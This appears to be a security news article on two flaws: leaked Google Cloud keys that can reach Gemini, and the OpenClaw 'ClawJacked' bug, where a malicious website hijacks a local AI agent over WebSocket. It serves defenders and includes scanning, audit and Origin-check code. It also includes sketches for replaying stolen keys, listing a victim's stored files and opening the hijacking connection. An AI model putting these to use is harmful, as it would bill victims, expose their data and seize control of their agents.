A recent security analysis has revealed that thousands of Google Cloud API keys available on the public internet could be misused to interact with Google’s Gemini artificial intelligence platform, creating both data exposure and financial risks.
Google Cloud API keys, often recognizable by the prefix “AIza,” are typically used to connect websites and applications to Google services and to track usage for billing. They are not meant to function as high-level authentication credentials. However, researchers from Truffle Security discovered that these keys can be leveraged to access Gemini-related endpoints once the Generative Language API is enabled within a Google Cloud project.
During their investigation, the firm identified nearly 3,000 active API keys embedded directly in publicly accessible client-side code, including JavaScript used to power website features such as maps and other Google integrations. According to security researcher Joe Leon, possession of a valid key may allow an attacker to retrieve stored files, read cached content, and generate large volumes of AI-driven requests that would be billed to the project owner. He further noted that these keys can now authenticate to Gemini services, even though they were not originally designed for that purpose.
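To illustrate how little an attacker needs, the sketch below shows how a key scraped from a page's JavaScript could, in principle, be replayed against the public Gemini REST endpoint. The request shape follows Google's documented generateContent format; the key is a placeholder and the specific model name is an assumption chosen for illustration only.

```typescript
// Sketch: replaying a leaked "AIza..." key against the public Gemini REST endpoint.
// The URL and request body follow Google's documented generateContent format;
// the key is a placeholder and the model name may differ per project.
const LEAKED_KEY = "AIza...";  // hypothetical key scraped from client-side JavaScript

async function callGeminiWithLeakedKey(prompt: string): Promise<string> {
  const url =
    "https://generativelanguage.googleapis.com/v1beta/models/" +
    `gemini-1.5-flash:generateContent?key=${LEAKED_KEY}`;

  const res = await fetch(url, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ contents: [{ parts: [{ text: prompt }] }] }),
  });

  if (!res.ok) throw new Error(`Request rejected: ${res.status}`);
  const data = await res.json();
  // Each successful call is billed, or counted against quota, on the key owner's project.
  return data.candidates?.[0]?.content?.parts?.[0]?.text ?? "";
}
```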
The root of the problem lies in how permissions are applied when the Gemini API is activated. If a project owner enables the Generative Language API, all existing API keys tied to that project may automatically inherit access to Gemini endpoints. This includes keys that were previously embedded in publicly visible website code. Critically, there is no automatic alert notifying users that older keys have gained expanded capabilities.
As a result, attackers who routinely scan websites for exposed credentials could capture these keys and use them to access endpoints such as file storage or cached content interfaces. They could also submit repeated Gemini API requests, potentially generating substantial usage charges for victims through quota abuse.
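The enumeration side of that threat can be pictured in a few lines as well. The paths below follow the publicly documented Gemini API's file-storage and context-cache listing endpoints; whether a given project actually exposes anything there depends on how the API is used, so treat this strictly as a hedged sketch.

```typescript
// Sketch: probing a project's Gemini file and cached-content listings with only a leaked key.
// Resource paths follow the publicly documented Gemini API surface; treat them as assumptions.
const KEY = "AIza...";  // placeholder for a scraped key
const BASE = "https://generativelanguage.googleapis.com/v1beta";

async function enumerateProjectData(): Promise<void> {
  for (const resource of ["files", "cachedContents"]) {
    const res = await fetch(`${BASE}/${resource}?key=${KEY}`);
    // A 200 response would reveal stored files or cached prompt content tied to the project.
    console.log(resource, res.status, await res.text());
  }
}

enumerateProjectData();
```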
The researchers also observed that when developers create a new API key within Google Cloud, the default configuration is set to “Unrestricted.” This means the key can interact with every enabled API within the same project, including Gemini, unless specific limitations are manually applied. In total, Truffle Security reported identifying 2,863 active keys accessible online, including one associated with a Google-related website.
Separately, Quokka published findings from a large-scale scan of 250,000 Android applications, uncovering more than 35,000 unique Google API keys embedded in mobile software. The company warned that beyond financial abuse through automated AI requests, organizations must consider broader implications. AI-enabled endpoints can interact with prompts, generated outputs, and integrated cloud services in ways that amplify the consequences of a compromised key.
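For defenders, finding such keys is largely a pattern-matching exercise. The snippet below is a minimal TypeScript sketch of the kind of scan Truffle Security and Quokka perform at scale, using the widely published "AIza" prefix pattern as a heuristic; it is not either firm's actual tooling.

```typescript
// Sketch: scanning extracted app resources or published web bundles for Google API keys.
// The "AIza" prefix plus 35 trailing characters is the commonly published heuristic
// for Google API keys; it is a pattern match, not an official specification.
import { readdirSync, readFileSync, statSync } from "node:fs";
import { join } from "node:path";

const GOOGLE_KEY_PATTERN = /AIza[0-9A-Za-z_-]{35}/g;

function findKeys(root: string, hits: Map<string, string[]> = new Map()): Map<string, string[]> {
  for (const entry of readdirSync(root)) {
    const path = join(root, entry);
    if (statSync(path).isDirectory()) {
      findKeys(path, hits);  // recurse into subdirectories
      continue;
    }
    const matches = readFileSync(path, "utf8").match(GOOGLE_KEY_PATTERN);
    if (matches) hits.set(path, [...new Set(matches)]);
  }
  return hits;
}

// Example: point it at decompiled APK resources or a site's published JavaScript bundles.
console.log(findKeys("./extracted-apk"));
```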
Even in cases where direct customer records are not exposed, the combination of AI inference access, consumption of service quotas, and potential connectivity to other Google Cloud resources creates a substantially different risk profile than developers may have anticipated when treating API keys as simple billing identifiers.
Although the behavior was initially described as functioning as designed, Google later confirmed it had collaborated with researchers to mitigate the issue. A company spokesperson stated that measures have been implemented to detect and block leaked API keys attempting to access Gemini services. There is currently no confirmed evidence that the weakness has been exploited at scale. However, a recent online post described an incident in which a reportedly stolen API key generated over $82,000 in charges within a two-day period, compared to the account’s typical monthly expenditure of approximately $180.
The situation remains under review, and further updates are expected if additional details surface.
Security experts recommend that Google Cloud users audit their projects to determine whether AI-related APIs are enabled. If such services are active and associated API keys are publicly accessible through website code or open repositories, those keys should be rotated immediately. Researchers advise prioritizing older keys, as they are more likely to have been deployed publicly under earlier guidance suggesting limited risk.
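A rough programmatic audit could look like the following sketch, which checks whether the Generative Language API is enabled on a project and flags keys that can reach it. It assumes an OAuth access token with read permissions; the endpoint paths and field names (Service Usage API, API Keys API v2) should be verified against current Google documentation before relying on them.

```typescript
// Sketch: a single-project audit pass, assuming a valid OAuth access token
// (for example from `gcloud auth print-access-token`). Field names are best-effort
// and should be checked against the current Service Usage and API Keys API docs.
const PROJECT = "my-project";          // hypothetical project ID
const TOKEN = process.env.GCP_TOKEN!;  // OAuth bearer token
const headers = { Authorization: `Bearer ${TOKEN}` };

async function auditGeminiExposure(): Promise<void> {
  // 1. Is the Generative Language API (Gemini) enabled on this project?
  const svc = await fetch(
    `https://serviceusage.googleapis.com/v1/projects/${PROJECT}/services/generativelanguage.googleapis.com`,
    { headers },
  ).then(r => r.json());
  if (svc.state !== "ENABLED") return;

  // 2. List API keys and flag any that lack API restrictions (the "Unrestricted" default)
  //    or that explicitly include the Gemini service.
  const { keys = [] } = await fetch(
    `https://apikeys.googleapis.com/v2/projects/${PROJECT}/locations/global/keys`,
    { headers },
  ).then(r => r.json());

  for (const key of keys) {
    const targets = key.restrictions?.apiTargets?.map((t: any) => t.service) ?? [];
    if (targets.length === 0 || targets.includes("generativelanguage.googleapis.com")) {
      console.log(`Key ${key.displayName ?? key.uid} can reach Gemini; consider restricting or rotating it.`);
    }
  }
}

auditGeminiExposure();
```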
Industry analysts emphasize that API security must be continuous. Changes in how APIs operate or what data they can access may not constitute traditional software vulnerabilities, yet they can materially increase exposure. As artificial intelligence becomes more tightly integrated with cloud services, organizations must move beyond periodic testing and instead monitor behavior, detect anomalies, and actively block suspicious activity to reduce evolving risk.
In other AI security news, OpenClaw has addressed a high-severity security flaw that could have allowed a malicious website to connect to a locally running AI agent and take control of it. According to the Oasis Security report, “Our vulnerability lives in the core system itself – no plugins, no marketplace, no user-installed extensions – just the bare OpenClaw gateway, running exactly as documented.”
The researchers codenamed the threat ClawJacked, and it is tracked as CVE-2026-25253. The flaw could have anchored a severe vulnerability chain allowing any website to hijack a person’s AI agent. It resided in the software’s main gateway: because OpenClaw is built to trust connections coming from the user’s own system, it could have given attackers easy access.
Consider a developer’s laptop on which OpenClaw is installed and running. Its gateway, a local WebSocket server, is password-protected and bound to localhost. The attack begins when the developer, through social engineering or some other lure, visits a website controlled by the attacker. According to the Oasis report, “Any website you visit can open one to your localhost. Unlike regular HTTP requests, the browser doesn't block these cross-origin connections. So while you're browsing any website, JavaScript running on that page can silently open a connection to your local OpenClaw gateway. The user sees nothing.”
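The browser-side step Oasis describes requires remarkably little code. The sketch below shows the general idea; the port number and message format are placeholders rather than details taken from OpenClaw’s documentation.

```typescript
// Sketch of the cross-origin step: a page the victim merely visits opens a WebSocket
// to the local gateway. Port and message format are placeholders, not OpenClaw specifics.
const GATEWAY_URL = "ws://127.0.0.1:18789";  // hypothetical local gateway port

const ws = new WebSocket(GATEWAY_URL);       // the browser does not block this cross-origin connection

ws.onopen = () => {
  // From here, page JavaScript can speak whatever protocol the gateway expects,
  // entirely in the background of the victim's browsing session.
  ws.send(JSON.stringify({ type: "command", payload: "..." }));  // illustrative only
};

ws.onmessage = (event) => {
  // Responses from the local agent arrive back in the attacker's page script.
  console.log("gateway replied:", event.data);
};
```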
The research highlights a clever trick involving WebSockets. The browser’s same-origin policy normally stops one website from meddling with resources that belong to another origin or to your machine, but WebSocket connections are an exception: the browser will open them across origins and leaves it to the server to decide, based on the handshake’s Origin header, whether the connection should be accepted. WebSockets are also designed as persistent, “always-on” channels over which data can flow in both directions.
The OpenClaw gateway assumed that any connection arriving from the user’s own computer (localhost) must be safe. That assumption is dangerous: if a developer running OpenClaw visits a malicious website, a hidden script embedded in the page can connect via WebSocket and interact directly with the AI tool in the background, while the user remains entirely unaware.
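As a generic illustration of why the localhost assumption fails, and of one common countermeasure (this is not OpenClaw’s actual patch), a local WebSocket gateway can inspect the Origin header that browsers attach to the handshake and reject connections initiated by arbitrary web pages. The example below uses the popular "ws" package for Node.js; the trusted origin and port are hypothetical.

```typescript
// Generic illustration, not OpenClaw's actual fix: validate the Origin header on
// incoming WebSocket handshakes so that connections opened by random web pages
// are rejected even though they arrive from 127.0.0.1.
import { WebSocketServer } from "ws";

const ALLOWED_ORIGINS = new Set(["http://localhost:3000"]);  // hypothetical trusted UI origin

const wss = new WebSocketServer({ host: "127.0.0.1", port: 18789 });  // placeholder port

wss.on("connection", (socket, request) => {
  const origin = request.headers.origin;
  // Browser-initiated connections carry the page's origin; a script on an attacker's
  // site shows up here as that site's URL, not as localhost.
  if (origin && !ALLOWED_ORIGINS.has(origin)) {
    socket.close(1008, "origin not allowed");  // 1008 = policy violation
    return;
  }
  // ...authenticated, trusted traffic continues here...
});
```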